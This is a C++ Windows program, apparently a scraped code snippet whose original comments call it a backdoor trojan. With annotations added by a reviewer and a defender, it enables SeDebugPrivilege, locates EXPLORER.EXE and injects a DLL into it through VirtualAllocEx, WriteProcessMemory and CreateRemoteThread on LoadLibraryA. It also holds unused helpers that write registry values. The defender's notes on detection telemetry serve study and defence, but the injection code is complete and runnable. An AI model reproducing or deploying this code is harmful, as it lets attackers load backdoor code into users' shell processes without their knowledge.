- #include "stdafx.h"
- #include <windows.h>
- #include <Tlhelp32.h>
- /**
- * Enable a named privilege on the current process's access token.
- * (Original comment: "elevate the backdoor's own privileges".)
- * @param name privilege name to enable; the caller in this file passes SE_DEBUG_NAME
- * @return true when OpenProcessToken, LookupPrivilegeValue and AdjustTokenPrivileges
- * all return non-zero; false at the first failing call
- * NOTE(review): a non-zero return from AdjustTokenPrivileges does not prove the privilege
- * was granted — the API reports ERROR_NOT_ALL_ASSIGNED via GetLastError when the token
- * lacks it, and that status is not checked here, so "true" can still mean "not enabled".
- * NOTE(review): hToken is never closed on any return path.
- * Defender's note: a non-debugger process enabling SeDebugPrivilege is a common precursor
- * to cross-process memory access and is visible through privilege-use auditing.
- */
- bool EnableDebugPriv(const char * name)
- {
- HANDLE hToken;
- TOKEN_PRIVILEGES tp;
- LUID luid;
- // Open our own token with only the access needed to query and adjust privileges
- if(!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES|TOKEN_QUERY, &hToken)) return false;
- // Resolve the privilege name to its locally unique ID (LUID)
- if(!LookupPrivilegeValue(NULL, name, &luid)) return false;
- tp.PrivilegeCount = 1;
- tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
- tp.Privileges[0].Luid = luid;
- // Adjust the process's privileges; the previous state is not requested (NULL, NULL)
- if(!AdjustTokenPrivileges(hToken, 0, &tp, sizeof(TOKEN_PRIVILEGES), NULL, NULL)) return false;
- return true;
- }
- /**
- * Inject a DLL into another process by having that process call LoadLibraryA on the path.
- * @param DllFullPath full path of the DLL to load (original comment: "backdoor trojan")
- * @param dwRemoteProcessId ID of the target process
- * @return false at the first failing Win32 call; true once the remote thread has been
- * created (creation only — the thread's outcome is neither awaited nor checked)
- * NOTE(review): hRemoteProcess and hRemoteThread are never closed, and the VirtualAllocEx
- * region is never released, on any return path.
- * Defender's note: OpenProcess(PROCESS_ALL_ACCESS) -> VirtualAllocEx -> WriteProcessMemory
- * -> CreateRemoteThread(LoadLibraryA) is the textbook remote-thread injection sequence;
- * it is precisely what cross-process-write and remote-thread-creation telemetry
- * (e.g. Sysmon's CreateRemoteThread event) is designed to surface.
- */
- bool InjectDll(const char *DllFullPath, const DWORD dwRemoteProcessId)
- {
- HANDLE hRemoteProcess, hRemoteThread;
- if(!EnableDebugPriv(SE_DEBUG_NAME)) return false;
- // Open the target process with full access
- if((hRemoteProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwRemoteProcessId)) == NULL) return false;
- char *pszLibFileRemote;
- // Reserve a writable buffer in the target large enough for the path plus its terminator
- pszLibFileRemote = (char *)VirtualAllocEx(hRemoteProcess, NULL, lstrlen(DllFullPath) + 1, MEM_COMMIT, PAGE_READWRITE);
- if(pszLibFileRemote == NULL) return false;
- // Write the DLL's full path into the target process's memory
- // (the cast drops const; WriteProcessMemory only reads from this buffer)
- if(WriteProcessMemory(hRemoteProcess, pszLibFileRemote, (void*)DllFullPath, lstrlen(DllFullPath) + 1, NULL) == 0) return false;
- // Get the address of LoadLibraryA from Kernel32 (resolved in the current process)
- PTHREAD_START_ROUTINE pfnStartAddr = (PTHREAD_START_ROUTINE)GetProcAddress(GetModuleHandle(TEXT("Kernel32")), "LoadLibraryA");
- if(pfnStartAddr == NULL) return false;
- // Start a thread in the target whose entry is LoadLibraryA and whose argument is the remote path buffer
- if((hRemoteThread = CreateRemoteThread(hRemoteProcess, NULL, 0, pfnStartAddr, pszLibFileRemote, 0, NULL)) == NULL) return false;
- return true;
- }
- /**
- * Find the ID of a running process by executable name.
- * @param ProcessName executable name to match, compared case-insensitively; this buffer is
- * rewritten in place by strupr, so it must be writable (not a string literal)
- * @return the th32ProcessID of the first matching snapshot entry, or 0 if the snapshot
- * could not be taken or no entry matched
- * NOTE(review): the snapshot handle is closed only when nothing matches; the `return`
- * inside the loop leaks it.
- * NOTE(review): strupr() uppercases both strings in place; main() in this file passes a
- * string literal, and writing to a string literal is undefined behavior.
- * NOTE(review): assumes an ANSI build where szExeFile is a char array — TODO confirm;
- * with UNICODE defined, PROCESSENTRY32 maps to the wide variant and strupr/strcmp on it
- * will not compile.
- */
- DWORD GetProcessID(char *ProcessName)
- {
- PROCESSENTRY32 pe32;
- pe32.dwSize = sizeof(pe32);
- // Take a snapshot of all processes on the system
- HANDLE hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
- if(hProcessSnap == INVALID_HANDLE_VALUE) return 0;
- // Enumerate the first process in the snapshot
- BOOL bProcess = Process32First(hProcessSnap, &pe32);
- while(bProcess)
- {
- // Case-insensitive compare: strupr rewrites both buffers in place
- if(strcmp(strupr(pe32.szExeFile), strupr(ProcessName)) == 0)
- //if(strcmp(pe32.szExeFile, ProcessName) == 0)
- {
- //return pe32.th32ParentProcessID;
- return pe32.th32ProcessID;
- }
- // Continue with the next process
- bProcess = Process32Next(hProcessSnap, &pe32);
- }
- CloseHandle(hProcessSnap);
- return 0;
- }
- /**
- * Create (or open) a registry key under hRoot and set a REG_EXPAND_SZ string value on it.
- * (Original comment: "modify a string-type registry value".)
- * @param hRoot root key handle supplied by the caller
- * @param szSubKey sub-key path; created as REG_OPTION_NON_VOLATILE if it does not exist
- * @param ValueName name of the value to set
- * @param Data NUL-terminated string to store
- * @return TRUE on success; FALSE if the key could not be created/opened or the value not set
- * NOTE(review): the byte count passed is strlen(Data), which omits the terminating NUL;
- * for REG_EXPAND_SZ the documented contract is that cbData includes the terminator, so
- * readers of this value may get an unterminated string.
- * NOTE(review): hKey is not closed when RegSetValueEx fails.
- * NOTE(review): not called from main() in this listing.
- */
- BOOL CreateStringReg(HKEY hRoot,char *szSubKey,char* ValueName,char *Data)
- {
- HKEY hKey;
- // Open the registry key, creating it if it does not exist (KEY_ALL_ACCESS requested)
- long lRet=RegCreateKeyEx(hRoot,szSubKey,0,NULL,REG_OPTION_NON_VOLATILE,KEY_ALL_ACCESS,NULL,&hKey,NULL);
- if (lRet!=ERROR_SUCCESS) return false;
- // Set the value, creating it if absent
- lRet=RegSetValueEx(hKey,ValueName,0,REG_EXPAND_SZ,(BYTE*)Data,strlen(Data));
- if (lRet!=ERROR_SUCCESS) return false;
- RegCloseKey(hKey);
- return true;
- }
- /**
- * Create (or open) a registry key under hRoot and set a REG_DWORD value on it.
- * (Original comment: "used to modify a numeric-type registry value".)
- * @param hRoot root key handle supplied by the caller
- * @param szSubKey sub-key path; created as REG_OPTION_NON_VOLATILE if it does not exist
- * @param ValueName name of the value to set
- * @param Data 32-bit value to store
- * @return TRUE on success; FALSE if the key could not be created/opened or the value not set
- * NOTE(review): hKey is not closed when RegSetValueEx fails.
- * NOTE(review): not called from main() in this listing.
- */
- BOOL CreateDWORDReg(HKEY hRoot,char *szSubKey,char* ValueName,DWORD Data)
- {
- HKEY hKey;
- // Open the registry key, creating it if it does not exist (KEY_ALL_ACCESS requested)
- long lRet=RegCreateKeyEx(hRoot,szSubKey,0,NULL,REG_OPTION_NON_VOLATILE,KEY_ALL_ACCESS,NULL,&hKey,NULL);
- if (lRet!=ERROR_SUCCESS) return false;
- DWORD dwSize=sizeof(DWORD);
- // Set the value, creating it if absent; the size is the full DWORD
- lRet=RegSetValueEx(hKey,ValueName,0,REG_DWORD,(BYTE*)&Data,dwSize);
- if (lRet!=ERROR_SUCCESS) return false;
- RegCloseKey(hKey);
- return true;
- }
- int main(int argc, char* argv[])
- {
- // Entry point: find a process named EXPLORER.EXE and inject InjectDLL.dll, taken from
- // the current working directory, into it. argc/argv are unused.
- char DllPath[255];
- // Original comment said "get the IE process", but the name looked up is EXPLORER.EXE
- // (the Windows shell), not IEXPLORE.EXE. NOTE(review): GetProcessID uppercases its
- // argument in place, and a string literal is passed here — undefined behavior.
- DWORD Pid=GetProcessID("EXPLORER.EXE");
- // Original comment said "get the program's own path", but GetCurrentDirectory returns the
- // current working directory, which need not be the executable's directory. Its return
- // value (0 on failure, or the required size when DllPath is too small) is not checked.
- GetCurrentDirectory(sizeof(DllPath), DllPath);
- // Build the DLL's full path. NOTE(review): strcat is unbounded and DllPath holds 255
- // bytes, less than MAX_PATH, so a long directory can overflow it. As written the literal
- // yields two backslashes at runtime; presumably one separator was intended and the extra
- // escaping came from the page's rendering — verify against the source.
- strcat(DllPath, "\\\\InjectDLL.dll");
- // Inject into the found process (original comment: "inject the IE process"); the result is ignored
- if(Pid) InjectDll(DllPath, Pid);
- return 0;
- }
- //该片段来自于http://www.codesnippet.cn/detail/221020136553.html
来源: http://www.codesnippet.cn/detail/221020136553.html